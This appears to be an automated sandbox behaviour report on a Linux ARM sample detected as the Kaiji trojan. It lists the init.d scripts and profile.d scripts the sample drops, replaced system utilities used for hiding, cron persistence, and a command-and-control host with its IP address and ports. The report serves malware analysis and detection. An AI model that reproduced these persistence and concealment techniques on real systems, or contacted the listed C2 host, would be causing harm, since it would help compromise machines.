              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/anacronJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmorJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/apportJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemonJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-supportJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetoothJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cronJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisksJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-earlyJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cupsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsedJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/dbusJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtempJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalanceJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsidJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/kmodJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdmJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensorsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolldJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4Jump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-toolsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsiJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-toolsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouthJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-logJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/procpsJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyncJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslogJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/sanedJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanupJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagentJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/sshJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/udevJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/ufwJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgradesJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/uuiddJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-commonJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/profile.d/bash_cfg.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/init.d/console-setup.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/init.d/hwclock.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/init.d/keyboard-setup.shJump to dropped file
              Source: /tmp/linux_arm6.elf (PID: 5488)Shell script file created: /etc/profile.d/gateway.shJump to dropped file
              Source: /usr/sbin/service (PID: 5515)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: /usr/sbin/service (PID: 5655)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior

              Hooking and other Techniques for Hiding and Protection

              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/acpid
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/alsa-utils
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/anacron
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/apparmor
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/apport
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/avahi-daemon
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/binfmt-support
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/bluetooth
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/console-setup.sh
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/cron
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/cryptdisks
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/cryptdisks-early
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/cups
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/cups-browsed
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/dbus
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/gdm3
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/hddtemp
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/hwclock.sh
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/irqbalance
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/iscsid
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/keyboard-setup.sh
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/kmod
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/lightdm
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/lm-sensors
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/lvm2-lvmpolld
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/mono-xsp4
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/multipath-tools
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/open-iscsi
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/open-vm-tools
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/plymouth
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/plymouth-log
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/procps
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/rsync
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/rsyslog
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/saned
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/screen-cleanup
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/spice-vdagent
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/ssh
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/udev
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/ufw
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/unattended-upgrades
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/uuidd
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /etc/init.d/x11-common
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/include/ps
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/include/ss
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/include/ls
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/include/dir
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/include/netstat
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/include/find
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/include/lsof
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/ps
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/ss
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/ls
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/dir
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/netstat
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/find
              Source: /tmp/linux_arm6.elf (PID: 5488) File: /usr/bin/lsof
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/include/ps
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/include/ss
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/include/ls
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/include/netstat
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/include/lsof
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/ps
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/ss
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/ls
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/netstat
              Source: /tmp/linux_arm6.elf (PID: 5488) Path: /usr/bin/lsof
              Source: /etc/32675 (PID: 5509) Sleep executable: /usr/bin/sleep -> sleep 60
              Source: /etc/32675 (PID: 5731) Sleep executable: /usr/bin/sleep -> sleep 60
              Source: /usr/bin/sleep (PID: 5509) Sleeps longer than 60s: 60.0s
              Source: /usr/bin/sleep (PID: 5731) Sleeps longer than 60s: 60.0s
              Source: /usr/sbin/cron (PID: 5670) Sleeps longer than 60s: 60.0s
              Source: /usr/sbin/cron (PID: 5716) Sleeps longer than 60s: 60.0s
              Source: /usr/sbin/cron (PID: 5716) Sleeps longer than 60s: 60.0s
              Source: /tmp/linux_arm6.elf (PID: 5483) Queries kernel information via 'uname'
              Source: /tmp/linux_arm6.elf (PID: 5488) Queries kernel information via 'uname'
              Source: /bin/bash (PID: 5501) Queries kernel information via 'uname'
              Source: /etc/32675 (PID: 5506) Queries kernel information via 'uname'
              Source: /etc/opt.services.cfg (PID: 5723) Queries kernel information via 'uname'
              Source: /etc/opt.services.cfg (PID: 5728) Queries kernel information via 'uname'
              Source: /bin/bash (PID: 5522) Queries kernel information via 'uname'
              Source: /bin/bash (PID: 5575) Queries kernel information via 'uname'
              Source: /bin/bash (PID: 5583) Queries kernel information via 'uname'
              Source: /boot/System.mod (PID: 5539) Queries kernel information via 'uname'
              Source: /boot/System.mod (PID: 5555) Queries kernel information via 'uname'
              Source: /boot/System.mod (PID: 5566) Queries kernel information via 'uname'
              Source: /.mod (PID: 5695) Queries kernel information via 'uname'
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5696) Queries kernel information via 'uname'
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5701) Queries kernel information via 'uname'
              Source: /.mod (PID: 5760) Queries kernel information via 'uname'
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5761) Queries kernel information via 'uname'
              Source: /usr/lib/libgdi.so.0.8.1 (PID: 5766) Queries kernel information via 'uname'
              Source: System.mod, 5555.1.00007fff780cd000.00007fff780ee000.rw-.sdmp Binary or memory string: hx86_64/usr/bin/qemu-arm/boot/System.mod
              Source: System.mod, 5571.1.00007ffd0795f000.00007ffd07980000.rw-.sdmp Binary or memory string: =Px86_64/usr/bin/qemu-arm/boot/System.mod
              Source: .mod, 5696.1.00007ffc409b5000.00007ffc409d6000.rw-.sdmp, libgdi.so.0.8.1, 5696.1.00007ffc409b5000.00007ffc409d6000.rw-.sdmp, .mod, 5761.1.00007ffd64f77000.00007ffd64f98000.rw-.sdmp, libgdi.so.0.8.1, 5761.1.00007ffd64f77000.00007ffd64f98000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.1SHELL=/bin/shPWD=/rootLOGNAME=rootHOME=/rootLANG=en_US.UTF-8SHLVL=1PATH=/usr/bin:/bin_=/usr/lib/libgdi.so.0.8.1/usr/lib/libgdi.so.0.8.1
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt
              Source: System.mod, 5555.1.000056216e548000.000056216eb73000.rw-.sdmp Binary or memory string: Un!VGeneralName!/etc/qemu-binfmt/arm
              Source: libgdi.so.0.8.1, 5701.1.0000564ae6bec000.0000564ae7220000.rw-.sdmp Binary or memory string: JV!/etc/qemu-binfmt/arm
              Source: open-vm-tools.14.dr Binary or memory string: rm -f /var/run/vmtoolsd.pid
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
              Source: System.mod, 5555.1.000056216e548000.000056216eb73000.rw-.sdmp Binary or memory string: Tn!Vrg.qemu.gdb.arm.sys.regs">
              Source: systemd, 5539.1.00007fffce7b9000.00007fffce7da000.rw-.sdmp, System.mod, 5539.1.00007fffce7b9000.00007fffce7da000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/boot/System.modLANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binINVOCATION_ID=0fc38d058b1e40c5b3ac4fb528025dddJOURNAL_STREAM=9:65821/boot/System.mod
              Source: systemd, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmp, System.mod, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmp Binary or memory string: eUrg.qemu.gdb.arm.sys.regs">
              Source: open-vm-tools.14.dr Binary or memory string: checktool='vmware-checkvm'
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmp Binary or memory string: Urg.qemu.gdb.arm.sys.regs">
              Source: systemd, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmp, System.mod, 5539.1.000055651cbb0000.000055651d2a1000.rw-.sdmp Binary or memory string: eUGeneralName!/etc/qemu-binfmt/arm
              Source: libgdi.so.0.8.1, 5701.1.00007f6030000000.00007f60300b3000.rw-.sdmp Binary or memory string: .qemu.gdb.arm.sys.regs"><reg name="AMAIR0_S" bitsize="32" group="cp_regs"/><reg name="AFSR0_EL1" bitsize="32" group="cp_regs"/><reg name="AMAIR1_S" bits
              Source: open-vm-tools.14.dr Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
              Source: libgdi.so.0.8.1, 5766.1.00007f9460000000.00007f94600b3000.rw-.sdmp, libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmp Binary or memory string: rg.qemu.gdb.arm.sys.regs">
              Source: linux_arm6.elf, 5483.1.00007fffc6027000.00007fffc6048000.rw-.sdmp Binary or memory string: +x86_64/usr/bin/qemu-arm/tmp/linux_arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/linux_arm6.elf
              Source: open-vm-tools.14.dr Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 || exit $?
              Source: open-vm-tools.14.dr Binary or memory string: # Check if we're running inside VMWare
              Source: open-vm-tools.14.dr Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1
              Source: open-vm-tools.14.dr Binary or memory string: if ! ${checktool} | grep -iq vmware; then
              Source: libgdi.so.0.8.1, 5701.1.0000564ae6bec000.0000564ae7220000.rw-.sdmp Binary or memory string: JVrg.qemu.gdb.arm.sys.regs">
              Source: opt.services.cfg, 5728.1.00007ffe090c3000.00007ffe090e4000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/etc/opt.services.cfg
              Source: systemd, 5566.1.00007fff061d1000.00007fff061f2000.rw-.sdmp, System.mod, 5566.1.00007fff061d1000.00007fff061f2000.rw-.sdmp Binary or memory string: cx86_64/usr/bin/qemu-arm/boot/System.modLANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binSERVICE_RESULT=successEXIT_CODE=exitedEXIT_STATUS=0INVOCATION_ID=0fc38d058b1e40c5b3ac4fb528025dddJOURNAL_STREAM=9:64498/boot/System.mod
              Source: libgdi.so.0.8.1, 5766.1.00007fff7cebd000.00007fff7cede000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.1
              Source: linux_arm6.elf, 5483.1.00005638b5371000.00005638b59c2000.rw-.sdmp Binary or memory string: 8Vrg.qemu.gdb.arm.sys.regs">
              Source: systemd, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmp, System.mod, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmp Binary or memory string: Vrg.qemu.gdb.arm.sys.regs">
              Source: linux_arm6.elf, 5483.1.00005638b5371000.00005638b59c2000.rw-.sdmp Binary or memory string: 8V!/etc/qemu-binfmt/arm
              Source: open-vm-tools.14.dr Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
              Source: opt.services.cfg, 5728.1.00007f4cdc000000.00007f4cdc0b1000.rw-.sdmp Binary or memory string: rg.qemu.gdb.arm.sys.regs">5M
              Source: open-vm-tools.14.dr Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
              Source: 32675, 5723.1.00007ffdcf7c2000.00007ffdcf7e3000.rw-.sdmp, opt.services.cfg, 5723.1.00007ffdcf7c2000.00007ffdcf7e3000.rw-.sdmp Binary or memory string: !x86_64/usr/bin/qemu-arm/etc/opt.services.cfgSHELL=/bin/bashCOLORTERM=truecolorSUDO_GID=1000SUDO_COMMAND=/bin/bashSUDO_USER=saturninoPWD=/tmpLOGNAME=rootXAUTHORITY=/run/user/1000/gdm/XauthorityHOME=/rootLANG=en_US.UTF-8TERM=xterm-256colorUSER=rootDISPLAY=:1.0SHLVL=1PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binSUDO_UID=1000MAIL=/var/mail/root_=/etc/opt.services.cfg/etc/opt.services.cfg
              Source: open-vm-tools.14.dr Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
              Source: libgdi.so.0.8.1, 5766.1.000055dc9f671000.000055dc9fca8000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
              Source: libgdi.so.0.8.1, 5766.1.00007f9460000000.00007f94600b3000.rw-.sdmp Binary or memory string: .qemu.gdb.arm.sys.regs"><reg name="AMAIR0_S" bitsize="32" group="cp_regs"/><reg name="AFSR0_EL1" bitsize="32" group="cp_
              Source: libgdi.so.0.8.1, 5766.1.00007fff7cebd000.00007fff7cede000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
              Source: systemd, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmp, System.mod, 5566.1.0000561d8391f000.0000561d83f54000.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/arm
              Source: open-vm-tools.14.dr Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid || exit 2

              Stealing of Sensitive Information

Source: Yara match | File source: linux_arm6.elf, type: SAMPLE
Source: Yara match | File source: /boot/System.mod, type: DROPPED
Source: Yara match | File source: /etc/opt.services.cfg, type: DROPPED
Source: Yara match | File source: /usr/bin/include/ss, type: DROPPED
Source: Yara match | File source: /usr/bin/include/ls, type: DROPPED
Source: Yara match | File source: /usr/bin/include/ps, type: DROPPED
Source: Yara match | File source: /usr/bin/dir, type: DROPPED
Source: Yara match | File source: /usr/lib/system-mark, type: DROPPED
Source: Yara match | File source: /usr/bin/include/netstat, type: DROPPED
Source: Yara match | File source: /usr/lib/libgdi.so.0.8.1, type: DROPPED
Source: Yara match | File source: /etc/profile.d/bash_cfg, type: DROPPED
Source: Yara match | File source: /usr/bin/find, type: DROPPED

              Remote Access Functionality

Source: Yara match | File source: linux_arm6.elf, type: SAMPLE
Source: Yara match | File source: /boot/System.mod, type: DROPPED
Source: Yara match | File source: /etc/opt.services.cfg, type: DROPPED
Source: Yara match | File source: /usr/bin/include/ss, type: DROPPED
Source: Yara match | File source: /usr/bin/include/ls, type: DROPPED
Source: Yara match | File source: /usr/bin/include/ps, type: DROPPED
Source: Yara match | File source: /usr/bin/dir, type: DROPPED
Source: Yara match | File source: /usr/lib/system-mark, type: DROPPED
Source: Yara match | File source: /usr/bin/include/netstat, type: DROPPED
Source: Yara match | File source: /usr/lib/libgdi.so.0.8.1, type: DROPPED
Source: Yara match | File source: /etc/profile.d/bash_cfg, type: DROPPED
Source: Yara match | File source: /usr/bin/find, type: DROPPED
MITRE ATT&CK Matrix

Each tactic column of the matrix is listed on its own line. A number in parentheses is the count of signatures in this report mapped to that technique; techniques without a number are shown for the tactic but did not trigger.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Scripting (2), Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Command and Scripting Interpreter (1), Scheduled Task/Job, At, Cron, Launchd
Persistence: Unix Shell Configuration Modification (1), Systemd Service (1), Scripting (2), Login Hook, Network Logon Script
Privilege Escalation: Unix Shell Configuration Modification (1), Systemd Service (1), Logon Script (Windows), Login Hook, Network Logon Script
Defense Evasion: Masquerading (12), Hide Artifacts (1), Virtualization/Sandbox Evasion (1), File and Directory Permissions Modification (1), Hidden Files and Directories (1)
Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Security Software Discovery (11), Virtualization/Sandbox Evasion (1), File and Directory Discovery (1), System Network Configuration Discovery, Internet Connection Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging
Command and Control: Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (1), Protocol Impersonation, Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: Data Manipulation (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact
              No configs have been found
Behavior Graph

Behavior Graph ID: 1572673 | Sample: linux_arm6.elf | Start date: 10/12/2024 | Architecture: LINUX | Score: 76

Network endpoints:
  cc.ava9527.cc -> 93.123.85.138 (ports 36016, 60888), NET1-ASBG, Bulgaria
  www.google.com

Signatures on the sample node:
  Multi AV Scanner detection for submitted file
  Yara detected Kaiji

Process tree (indentation = parent/child; dropped files and signatures are listed under the process that produced them):

linux_arm6.elf
  linux_arm6.elf
    dropped: /usr/lib/system-mark (ELF), /usr/lib/libgdi.so.0.8.1 (ELF), /usr/bin/ss (ELF), 63 other files (62 malicious)
    signatures: Sample tries to set files in /etc globally writable; Writes identical ELF files to multiple locations; Sample tries to persist itself using /etc/profile; Drops files in suspicious directories
    bash
      dropped: /etc/crontab (ASCII)
      signature: Sample tries to persist itself using cron
    service systemctl
      service
        systemctl
        sed
      basename
      2 other processes
    service systemctl
      service
        systemctl
        sed
      3 other processes
    6 other processes
      bash
        32675
          opt.services.cfg
            opt.services.cfg
          sleep
          sleep
      7 other processes
systemd
  cron
    cron
      sh
        .mod
          libgdi.so.0.8.1
            libgdi.so.0.8.1
systemd
  cron
    cron
      sh
        .mod
          libgdi.so.0.8.1
            libgdi.so.0.8.1
6 other processes
  System.mod
    System.mod
  System.mod
    System.mod

Antivirus, Machine Learning and Genetic Malware Detection

Submitted sample:
Source | Detection | Scanner | Label
linux_arm6.elf | 34% | ReversingLabs | Linux.Trojan.Kaiji

Dropped files:
Source | Detection | Scanner | Label
/.mod | 0% | ReversingLabs |
/boot/System.mod | 34% | ReversingLabs | Linux.Trojan.Kaiji
/etc/32675 | 0% | ReversingLabs |
/etc/init.d/acpid | 0% | ReversingLabs |
/etc/init.d/alsa-utils | 0% | ReversingLabs |
/etc/init.d/anacron | 0% | ReversingLabs |
/etc/init.d/apparmor | 0% | ReversingLabs |
/etc/init.d/avahi-daemon | 0% | ReversingLabs |
/etc/init.d/binfmt-support | 0% | ReversingLabs |
/etc/init.d/bluetooth | 0% | ReversingLabs |
/etc/init.d/console-setup.sh | 0% | ReversingLabs |
/etc/init.d/cron | 0% | ReversingLabs |
/etc/init.d/cryptdisks | 0% | ReversingLabs |
/etc/init.d/cryptdisks-early | 0% | ReversingLabs |
/etc/init.d/cups | 0% | ReversingLabs |
/etc/init.d/cups-browsed | 0% | ReversingLabs |
/etc/init.d/dbus | 0% | ReversingLabs |
/etc/init.d/gdm3 | 0% | ReversingLabs |
/etc/init.d/hddtemp | 0% | ReversingLabs |
/etc/init.d/hwclock.sh | 0% | ReversingLabs |
/etc/init.d/irqbalance | 0% | ReversingLabs |
/etc/init.d/iscsid | 0% | ReversingLabs |
/etc/init.d/keyboard-setup.sh | 0% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.181.68 | true | false | | high
cc.ava9527.cc | 93.123.85.138 | true | false | | unknown
URLs

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.gnu.org/software/coreutils/ | ls.14.dr, dir.14.dr | false | | high
http://html4/loose.dtd | System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.dr | false | | high
https://translationproject.org/team/ | dir.14.dr | false | | high
https://wiki.xiph.org/MIME_Types_and_File_Extensions.ogv | ls.14.dr, dir.14.dr | false | | high
https://gnu.org/licenses/gpl.html | ls.14.dr, dir.14.dr | false | | high
https://github.com/lsof-org/lsof | lsof.14.dr | false | | high
https://wiki.xiph.org/MIME_Types_and_File_Extensions | ls.14.dr, dir.14.dr | false | | high
https://www.gnu.org/gethelp/ | ls.14.dr, dir.14.dr | false | | high
https://github.com/lsof-org/lsof/blob/master/Lsof.8 | lsof.14.dr | false | | high
http://.css | System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.dr | false | | high
https://github.com/lsof-org/lsof/blob/master/00FAQ | lsof.14.dr | false | | high
